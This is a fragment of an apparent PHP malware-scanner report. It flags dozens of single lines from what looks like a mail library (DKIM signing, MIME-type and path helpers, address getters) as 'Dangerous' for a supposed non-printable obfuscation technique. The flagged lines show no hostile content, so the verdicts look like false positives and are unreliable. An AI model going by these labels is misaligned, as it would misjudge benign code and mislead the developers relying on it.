</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$html</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$converter</span><span style="color: #007700">-></span><span style="color: #0000BB">get_text</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">html2text</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$advanced</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html_entity_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string MIME type of file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3808</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3911</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mimes</span><span style="color: #007700">[</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext</span><span style="color: #007700">)];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'application/octet-stream'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3923</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">filenameToType</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3931</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$pathinfo</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3938</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#107461</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">only the specified piece</span><span style="color: #007700">, </span><span style="color: #0000BB">allows </span><span style="color: #DD0000">'filename' </span><span style="color: #0000BB">to work on PHP </span><span style="color: #007700">< </span><span style="color: #0000BB">5.2</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3942</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3945</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mb_pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'dirname'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'basename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3972</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3975</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3977</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function - </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s more verbose, less efficient, more error-prone and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3995</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4014</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(array(</span><span style="color: #DD0000">"\r"</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n"</span><span style="color: #007700">), </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">normalizeBreaks</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype </span><span style="color: #007700">= </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4029</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/(\r\n|\r|\n)/ms'</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$cert_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_pass</span><span style="color: #007700">, </span><span style="color: #0000BB">$extracerts_filename </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4054</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_QP</span><span style="color: #007700">(</span><span style="color: #0000BB">$txt</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$line</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4073</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The DKIM signature value</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4075</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$signature</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_HeaderC</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_BodyC</span><span style="color: #007700">(</span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Add</span><span style="color: #007700">(</span><span style="color: #0000BB">$headers_line</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dkimhdrs </span><span style="color: #007700">. </span><span style="color: #0000BB">$signed </span><span style="color: #007700">. </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4242</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasLineLongerThanMax</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4245</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/^(.{'</span><span style="color: #007700">.(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">MAX_LINE_LENGTH </span><span style="color: #007700">+ </span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">',})/m'</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">to</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCcAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4267</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">cc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBccAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4278</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">bcc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getReplyToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">ReplyTo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4298</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAllRecipientAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">all_recipients</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doCallback</span><span style="color: #007700">(</span><span style="color: #0000BB">$isSent</span><span style="color: #007700">, </span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$cc</span><span style="color: #007700">, </span><span style="color: #0000BB">$bcc</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$from</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4315</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function) && </span><span style="color: #0000BB">is_callable</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">action_function</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4332</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">errorMessage</span><span style="color: #007700">()</span>
</span>
